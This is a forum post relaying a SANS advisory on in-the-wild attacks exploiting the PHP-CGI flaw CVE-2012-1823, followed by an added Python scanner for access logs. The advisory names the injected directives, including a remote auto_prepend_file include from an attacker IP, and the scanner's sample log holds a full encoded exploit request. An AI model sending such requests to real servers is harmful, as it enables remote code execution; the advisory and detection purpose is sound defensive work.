Topic: PHP exploit in the wild CVE-2012-1823
« on: May 28, 2012, 03:29:42 »
AplusWebMaster

FYI...

PHP exploit in the wild CVE-2012-1823 ...
- https://isc.sans.edu/diary.html?storyid=13312
Last Updated: 2012-05-28 03:48:35 UTC - "... an attempt to exploit the PHP vulnerability CVE-2012-1823* with the remote execution variant... each of the options invoked:
safe_mode=off: PHP disables the capacity of checking if the owner of the current script matches the owner of the file to be operated by a file functionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on these functions, please check the PHP manual***.
allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
allow_url_include=on: This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and executes it before the code inside index.php.
You can prevent this by using the latest stable PHP version located at the downloads page (1). If you are using Windows... you can be affected by the CVE-2012-2376 (2). For more information regarding remediation on this vulnerability, please check my previous diary** ..."
* http://www.cvedetails.com/cve/CVE-2012-1823

>> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 - 7.5 (HIGH)
"... before 5.4.2..."

** http://isc.sans.edu/diary.html?storyid=13255

*** http://php.net/manual/en/index.php

1. http://www.php.net/downloads.php

2. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2376 - 10.0 (HIGH)
Last revised: 05/21/2012
Overview: Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012...

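One way to look for the directive overrides listed in the post above in web server access logs, as an added example that is not part of the original post or the ISC diary. It assumes Apache combined log format; the log lines, client addresses and the placeholder URL are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Directives named in the quoted diary, each with a test for the weakening value.
RISKY = {
    "safe_mode": lambda v: v.lower() in ("off", "0"),
    "disable_functions": lambda v: v.lower() in ("null", ""),
    "allow_url_fopen": lambda v: v.lower() in ("on", "1"),
    "allow_url_include": lambda v: v.lower() in ("on", "1"),
    "auto_prepend_file": lambda v: re.match(r"(?i)(https?|ftp)://", v) is not None,
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
DIRECTIVE_RE = re.compile(r"(?:^|\s)-d\s*([A-Za-z_.]+)=(\S*)")

def inspect_line(line):
    """Return (client, status, {directive: value}) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    _, sep, query = target.partition("?")
    # The query string reaches php-cgi as arguments only when it has no raw '=',
    # so requests of interest carry the '=' percent-encoded (%3d).
    if not sep or "=" in query:
        return None
    decoded = unquote_plus(query)
    hits = {k: v for k, v in DIRECTIVE_RE.findall(decoded)
            if k in RISKY and RISKY[k](v)}
    return (client, int(status), hits) if hits else None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation address ranges, placeholder URL).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/May/2012:03:10:01 +0000] "GET /index.php?-d+safe_mode%3doff'
    '+-d+disable_functions%3dnull+-d+allow_url_fopen%3don+-d+allow_url_include%3don'
    '+-d+auto_prepend_file%3dhttp://192.0.2.10/placeholder.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/May/2012:03:11:40 +0000] '
    '"GET /index.php?page=2&allow_url_include=on HTTP/1.1" 200 1024',
    '203.0.113.9 - - [28/May/2012:03:12:02 +0000] "GET /index.php?about HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for client, status, hits in scan(SAMPLE_LOG):
        print(client, status, sorted(hits))
```

A finding with a 200 status on a host still running a PHP version before the fixed release is worth treating as a possible compromise rather than a blocked probe.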